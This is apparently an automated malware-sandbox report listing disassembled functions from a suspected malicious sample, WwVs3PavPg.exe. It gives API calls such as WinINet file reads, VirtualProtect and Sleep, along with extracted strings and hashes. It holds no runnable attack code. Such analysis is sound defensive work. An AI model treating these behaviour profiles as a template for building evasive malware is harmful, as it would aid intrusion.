Instruction ID: f3638e34a91a9eb389efc8ebeddf53615fc296e693e6a5b1e9022694aa798f79
Opcode Fuzzy Hash: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
Instruction Fuzzy Hash: C1117F31A50B08BAE920B7B1DC05FCBF79CEF05704F800858FBAD760B0DA66B5145660

Function 04CF6482 Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 04CF644A: _free.LIBCMT ref: 04CF646F

_free.LIBCMT ref: 04CF64D0
_free.LIBCMT ref: 04CF64DB
_free.LIBCMT ref: 04CF64E6
_free.LIBCMT ref: 04CF653A
_free.LIBCMT ref: 04CF6545
_free.LIBCMT ref: 04CF6550
_free.LIBCMT ref: 04CF655B

Memory Dump Source

Source File: 00000000.00000003.2562228474.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4ce0000_WwVs3PavPg.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
Instruction ID: d115a3c1556e8c7a8b1246ba41cab4f2983be82c3d72136885d86cadfd654bff
Opcode Fuzzy Hash: 68c17f3537dccb6f407bd63d1e3096b2584649c38850d27baa78e981a952f3fd
Instruction Fuzzy Hash: 01119632741704B6F6A0F770CC06FCB7B9E6F00708F408818BB9966152D67DB545A761

Function 04B57F3A Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,00000000), ref: 04B57F82
__fassign.LIBCMT ref: 04B58161
__fassign.LIBCMT ref: 04B5817E
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04B581C6
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04B58206
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 04B582B2

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 7b0876cbb8b9c7573fbc639d1b90b5e6ef59ffe5efa56104f918bce5801debe4
Instruction ID: 8606dff038d5312d631dc210a50766c7e4134fa67084ac058c82fc762aa38f79
Opcode Fuzzy Hash: 7b0876cbb8b9c7573fbc639d1b90b5e6ef59ffe5efa56104f918bce5801debe4
Instruction Fuzzy Hash: ACD1C970E016489FDF11DFE8D880AEDFBB5FF48304F2840AAE815BB261D631A952CB50

Function 04B4B00B Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,04B4B002,04B4A5C6,04B49C00), ref: 04B4B019
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04B4B027
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04B4B040
SetLastError.KERNEL32(00000000,04B4B002,04B4A5C6,04B49C00), ref: 04B4B092

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
Instruction ID: 5d97d5de8773b9d009742cf9eef0d20d8d296e21d72a888fe39dd23c57b746e0
Opcode Fuzzy Hash: 6119c639a046b9dd424e980e58b60d2be106995ff750bb25c6883d2720f1beb8
Instruction Fuzzy Hash: 9D01AC3270D3116FBB346FB47C849762B54EB8167A72102B9F724562E1EF59F8127144

Function 04B55D7F Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 04B55DCD
_free.LIBCMT ref: 04B55F19

Strings

*?, xrefs: 04B55DC2

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: _free_strpbrk
String ID: *?
API String ID: 3300345361-2564092906
Opcode ID: 9801757e2809db45aacd2951d7023101c81a7ef7fa1d77123c738ef8fc315dd7
Instruction ID: 1b74f13dbcba2150a1fd9868d0adae7fc2dc7661cc718da73cb4b4ef5f34790c
Opcode Fuzzy Hash: 9801757e2809db45aacd2951d7023101c81a7ef7fa1d77123c738ef8fc315dd7
Instruction Fuzzy Hash: 3E615F75E00219AFDF24DFA8C8806EDFBF5EF48314B1585AAE815F7354D631AE418B90

Function 04B56383 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\WwVs3PavPg.exe, xrefs: 04B56388

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\Desktop\WwVs3PavPg.exe
API String ID: 0-188618602
Opcode ID: 93954dfdee92f46bb96adc8c87a9eb3aaf0f63e636dd7cac714efb5796973790
Instruction ID: f552e073e65239589d6095b5991a64c7f020a132d82bace3d2b8a8f69f5e1887
Opcode Fuzzy Hash: 93954dfdee92f46bb96adc8c87a9eb3aaf0f63e636dd7cac714efb5796973790
Instruction Fuzzy Hash: 7221D471600105BFEB20BF698C80E6BB7ADEF402A874185A4FD2DC7260E731FC519760

Function 04B42BB7 Relevance: 7.6, APIs: 5, Instructions: 113memorywindowCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 04B42C5F
GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 04B42C74
FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 04B42C82
LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 04B42C9D
OutputDebugStringA.KERNEL32(00000000,?,?), ref: 04B42CBC

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
String ID:
API String ID: 2509773233-0
Opcode ID: 98a23b1f51539c79b15504070a912fe8a1d772cf35a21b11453b2abeaae28325
Instruction ID: 8e0c3b542556c10dfa7e3922ea7325ac6b0ed9a3e589e4877d3c30077f841730
Opcode Fuzzy Hash: 98a23b1f51539c79b15504070a912fe8a1d772cf35a21b11453b2abeaae28325
Instruction Fuzzy Hash: 71310471B00014AFDB18DF68DC45FBAB768EF88704F0541E9F905EB252DB31A912EB94

Function 04B57248 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 04B57260

Part of subcall function 04B51D29: HeapFree.KERNEL32(00000000,00000000,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?), ref: 04B51D3F
Part of subcall function 04B51D29: GetLastError.KERNEL32(?,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?,?), ref: 04B51D51

_free.LIBCMT ref: 04B57272
_free.LIBCMT ref: 04B57284
_free.LIBCMT ref: 04B57296
_free.LIBCMT ref: 04B572A8

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
Instruction ID: 483566ea0ef53b89664ed2dd7fd9b40260e4331b71de85a4830a2d39d41bba32
Opcode Fuzzy Hash: 66f692938bcf18abe0cb3e5c7653619a9fabf3dc7bd25fd00b9023d19967cfd6
Instruction Fuzzy Hash: CEF04432B142146BCA34DB58F586E16B3DDEB01720BA40885FC28D7560CF25FC914A54

Function 04B458D0 Relevance: 7.5, APIs: 1, Strings: 3, Instructions: 476COMMON

Download Yara Rule

Strings

rB, xrefs: 04B459EE
rB, xrefs: 04B46527
O*, xrefs: 04B45A5F

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID:
String ID: O*$rB$rB
API String ID: 0-546290271
Opcode ID: f523bc33ae5dcf39d7c7f9cffc68d396c9ac6c1ced86010178b4c982eee15dc0
Instruction ID: b76375a6d1ccb6514fecc0a490c549058fda5aaf315fa6300b765a8ff46226aa
Opcode Fuzzy Hash: f523bc33ae5dcf39d7c7f9cffc68d396c9ac6c1ced86010178b4c982eee15dc0
Instruction Fuzzy Hash: 52121771D002489BEB18EBB8DC54BEDB7B4EF95308F1080E8E54567191EF34BA49EB61

Function 04B4516B Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F

__Init_thread_footer.LIBCMT ref: 04B451B2

Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA

Sleep.KERNEL32(000007D0), ref: 04B4552A
Sleep.KERNEL32(000007D0), ref: 04B45544

Strings

updateSW, xrefs: 04B4544F

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeaveSleep$Init_thread_footer
String ID: updateSW
API String ID: 500923978-2484434887
Opcode ID: a48b40eb8ce9b0f2e770e20945fe188cfd2cc4dc723a840eb928d6538466b87f
Instruction ID: c6fd249a583e1bd64c1d0d5cf636f5f3d56e5160116afebae93ef7f49f3738a4
Opcode Fuzzy Hash: a48b40eb8ce9b0f2e770e20945fe188cfd2cc4dc723a840eb928d6538466b87f
Instruction Fuzzy Hash: CED1D4B1A005649BEB38DB28CC887ADB771EFC1308F1441E9D9096B295DB75AEC4DB41

Function 04B52A89 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 04B52B10

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
Instruction ID: 02a552d982c9984a1b1bac77fe61ae331d2408373eee9c2b43d7e4130cbb2361
Opcode Fuzzy Hash: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
Instruction Fuzzy Hash: 1FB11532A062869FEB19CF28C8807BEFBF5EF45340F1445E9DC549B2A1D634A902CF60

Function 04CF1C22 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 04CF1CA9

Memory Dump Source

Source File: 00000000.00000003.2562228474.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4ce0000_WwVs3PavPg.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
Instruction ID: 77a643673ec7d88cd29a2edf076a5074e238e4b33c83bd47411dea4c6174af87
Opcode Fuzzy Hash: 00bd01e052c6ca4725e3dc98c9fc8d994eb0987dbdd7d2e2c545ffa9104eb7c9
Instruction Fuzzy Hash: 3CB12831A00285DFEB55CF29CC507BEBBF6EF45350F1C456AD6459B241EA39AE02CB60

Function 04B41AE7 Relevance: 6.3, APIs: 4, Instructions: 298networkfileCOMMON

Download Yara Rule

APIs

InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 04B41B6C
InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 04B41B8B

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: FileInternet$PointerRead
String ID:
API String ID: 3197321146-0
Opcode ID: f9ec063c9d2e41b3af08dc7f95bc4ff4171d8ea44204e87ef2b2e3f71c5be050
Instruction ID: 38f03f2f50ce7fb5e1d488fa682dcfb14914d823c11f0e815f3cc0a36ff6d32e
Opcode Fuzzy Hash: f9ec063c9d2e41b3af08dc7f95bc4ff4171d8ea44204e87ef2b2e3f71c5be050
Instruction Fuzzy Hash: 96C16EB0A002189FEB25CF28CD88BEAB7B5FF89704F1045D8E509A7690D775BA85CF50

Function 04B4B0EB Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 04B4B1B2
___AdjustPointer.LIBCMT ref: 04B4B1D5
___AdjustPointer.LIBCMT ref: 04B4B271

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
Instruction ID: f0bc5704de4a8aec523d52425b52e3bee8f4acdc25eac687b52e62684058ebf2
Opcode Fuzzy Hash: 9375933aa2df3e20f0ca1827bdd97f55dc499c02a50483b9e33265720776713f
Instruction Fuzzy Hash: CE51E372A08602AFEF298F10D880B7A7BA4FF84304F1445ADDA4597A90E731F951FB91

Function 04B55CB0 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 04B4FE6F: _free.LIBCMT ref: 04B4FE7D

Part of subcall function 04B5375E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,04B588CA,?,?,?,00000000,?,04B58639,0000FDE9,00000000,?), ref: 04B53800

GetLastError.KERNEL32 ref: 04B55D18
__dosmaperr.LIBCMT ref: 04B55D1F
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 04B55D5E
__dosmaperr.LIBCMT ref: 04B55D65

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 2446def1f9b4e50dcca6d59721d257bc06bfc03ce38444d90e74b9eed1d69467
Instruction ID: 08308f1979cd23a2967e901f9ccb00e7a8daaa7dba466098c2f7cb83c5f6d14b
Opcode Fuzzy Hash: 2446def1f9b4e50dcca6d59721d257bc06bfc03ce38444d90e74b9eed1d69467
Instruction Fuzzy Hash: 9821D872600605BFEB30AF65CC84F6BF7ACEF402697004598ED29975A0E731FD009750

Function 04B51DB1 Relevance: 6.1, APIs: 4, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
Instruction ID: ad62378e5a4cb657ef427a22b8bffecd54b32d2b315963f5834abef0fb0ddb65
Opcode Fuzzy Hash: e542fd5fe1f20daa28cc2bb0b7df5d538cfe0501b749800661c5dcfdf3bad05e
Instruction Fuzzy Hash: 7121D871F01221BBDB318B2C9C84B5AB764EF417A0F150DA1ED06A72B0EA30FD01D6E4

Function 04B51464 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(04B4213F,?,04B42143,04B4C610,?,04B4213F,0041D0A0,?,04B51714,00000000,0041D0A0,00000000,00000000,04B4213F), ref: 04B51469
_free.LIBCMT ref: 04B514C6
_free.LIBCMT ref: 04B514FC
SetLastError.KERNEL32(00000000,0042A174,000000FF,?,04B51714,00000000,0041D0A0,00000000,00000000,04B4213F), ref: 04B51507

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: d87a196747eb98be69f930891d617142d2a680cdf12a75ecda7b171a806f77d5
Instruction ID: 83c9c325586f02c49b688f083690531fbb78fc7f4d2aeebf1767d39968b0b31e
Opcode Fuzzy Hash: d87a196747eb98be69f930891d617142d2a680cdf12a75ecda7b171a806f77d5
Instruction Fuzzy Hash: BF11C232F012043BE7222BBCAC85F3AA659CBC1278B6456F4FD24961F0EB25AC129915

Function 04B515BB Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,04B4C5A5,04B52748,?,?,04B4A3C2,?,?,?,04B41353,?,04B4370E,?,?), ref: 04B515C0
_free.LIBCMT ref: 04B5161D
_free.LIBCMT ref: 04B51653
SetLastError.KERNEL32(00000000,0042A174,000000FF,?,04B4A3C2,?,?,?,04B41353,?,04B4370E,?,?,?), ref: 04B5165E

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 7782d265afb65f697e55785a8c86fcbb5444133996192f0522372e2b86f319e8
Instruction ID: 67b24782ee60f7b0215e44da9312ff3ebd04ff82c535b599612bba0dd6aeb964
Opcode Fuzzy Hash: 7782d265afb65f697e55785a8c86fcbb5444133996192f0522372e2b86f319e8
Instruction Fuzzy Hash: 6D11E536F012002BE72267BD7C85F3AA25ADBC5278BA903F5FD24921F0DB75AC119515

Function 04B4C07E Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,04B4C13F,?,?,0042B000,00000000,?,04B4C26A,00000004,0041EAFC,0041EAF4,0041EAFC,00000000), ref: 04B4C10E

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
Instruction ID: fc2cc1ff71d54b07b6cac171b20c902f5989dabbeed35ce056e4c10f738151fd
Opcode Fuzzy Hash: 8c81ecf0019ecd7373f14f2a550921ad389bcfade9b3345979a598c502b3af19
Instruction Fuzzy Hash: B811E731A42221ABDB224F699C45B9D3B74EF46FA0F1241A0FE01B7380D770F90096D8

Function 04B5B089 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,04B5AD36,00000000,00000001,00000000,00000000,?,04B5830F,00000000,00000000,00000000), ref: 04B5B0A0
GetLastError.KERNEL32(?,04B5AD36,00000000,00000001,00000000,00000000,?,04B5830F,00000000,00000000,00000000,00000000,00000000,?,04B58863,?), ref: 04B5B0AC

Part of subcall function 04B5B072: CloseHandle.KERNEL32(0042A930,04B5B0BC,?,04B5AD36,00000000,00000001,00000000,00000000,?,04B5830F,00000000,00000000,00000000,00000000,00000000), ref: 04B5B082

___initconout.LIBCMT ref: 04B5B0BC

Part of subcall function 04B5B034: CreateFileW.KERNEL32(004265E8,40000000,00000003,00000000,00000003,00000000,00000000,04B5B063,04B5AD23,00000000,?,04B5830F,00000000,00000000,00000000,00000000), ref: 04B5B047

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,04B5AD36,00000000,00000001,00000000,00000000,?,04B5830F,00000000,00000000,00000000,00000000), ref: 04B5B0D1

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
Instruction ID: 54ca15ac29abb2cc356db3baf26df87052cd03596aeb9704bf31b045e8cf73b7
Opcode Fuzzy Hash: 97bc7316d447aef358a923f7b3dd71aa940d3f3799f1ac4c849028fc35db30d0
Instruction Fuzzy Hash: EFF03036901114BFCF226FA1DC08ADDBF26FF086A4F094460FE1E96130C632A961DB95

Function 04B50CAD Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 04B50CB6

Part of subcall function 04B51D29: HeapFree.KERNEL32(00000000,00000000,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?), ref: 04B51D3F
Part of subcall function 04B51D29: GetLastError.KERNEL32(?,?,04B572DB,?,00000000,?,?,?,04B57302,?,00000007,?,?,04B575E1,?,?), ref: 04B51D51

_free.LIBCMT ref: 04B50CC9
_free.LIBCMT ref: 04B50CDA
_free.LIBCMT ref: 04B50CEB

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
Instruction ID: 2a638163b3dbc4a5c9aadf3cbc1385501b8d40215370a85339a438bd3f7c2bfd
Opcode Fuzzy Hash: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
Instruction Fuzzy Hash: 52E0EC79E13334AAD6366F18BD40649FF69EBD8B143C50076E83012270C7322553ABCE

Function 04CEFE46 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 04CEFE4F
_free.LIBCMT ref: 04CEFE62
_free.LIBCMT ref: 04CEFE73
_free.LIBCMT ref: 04CEFE84

Memory Dump Source

Source File: 00000000.00000003.2562228474.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4ce0000_WwVs3PavPg.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
Instruction ID: a52cc2ab89454d24c6d9fecf1b2cf4ea9ab31382e6dc5c5c8b4052db5e01ed63
Opcode Fuzzy Hash: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
Instruction Fuzzy Hash: 81E0EC71B133209A96726F15BD4044AFF62EBD4F143C5803AE54012332C77A2953EBCE

Function 04B503E4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\WwVs3PavPg.exe, xrefs: 04B50427, 04B5042E, 04B50464

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\Desktop\WwVs3PavPg.exe
API String ID: 0-188618602
Opcode ID: 9c4445743612698079b74687b6d690de0a76c3e5134965afe2d5fa7eb50f9b57
Instruction ID: a738876d3c2ff8ac166625f641da9be7d3e0f88f925c14354a04c58037eea498
Opcode Fuzzy Hash: 9c4445743612698079b74687b6d690de0a76c3e5134965afe2d5fa7eb50f9b57
Instruction Fuzzy Hash: 6D416671A00218AFDB21EF9DDC81AAEFBB8EFC5314B5000A6E805D7261E770AA41DB54

Function 04B4AE47 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 04B4AE86
__IsNonwritableInCurrentImage.LIBCMT ref: 04B4AF3A

Strings

csm, xrefs: 04B4AF24

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
Instruction ID: d8fea0a21baf093387e28021d95f836c02d33f5530b8aa594742145cc105e3b7
Opcode Fuzzy Hash: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
Instruction Fuzzy Hash: CA41C470A40218ABCF10DF68C884A9EBFB4EF89318F1485D5EC18AB351D735FA15DBA1

Function 04B4B6EC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 04B4B711

Strings

MOC, xrefs: 04B4B723
RCC, xrefs: 04B4B72B

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
Instruction ID: 923960378f10a42f4d89f9f1eca47e0f2ee5ca5c2c0ddb50a050844d7370f4e8
Opcode Fuzzy Hash: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
Instruction Fuzzy Hash: 53415871900209AFDF15CF98C881AEEBBB5FF88314F158099FA15A7211D335F950EB50

Function 04B41597 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 04B493D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B493E2
Part of subcall function 04B493D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B4941F

__Init_thread_footer.LIBCMT ref: 04B41622

Part of subcall function 04B4938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B49397
Part of subcall function 04B4938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B493CA

Strings

FEKN, xrefs: 04B415F1
NE]D, xrefs: 04B415B7

Memory Dump Source

Source File: 00000000.00000002.3074233327.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b40000_WwVs3PavPg.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer
String ID: FEKN$NE]D
API String ID: 4132704954-517842756
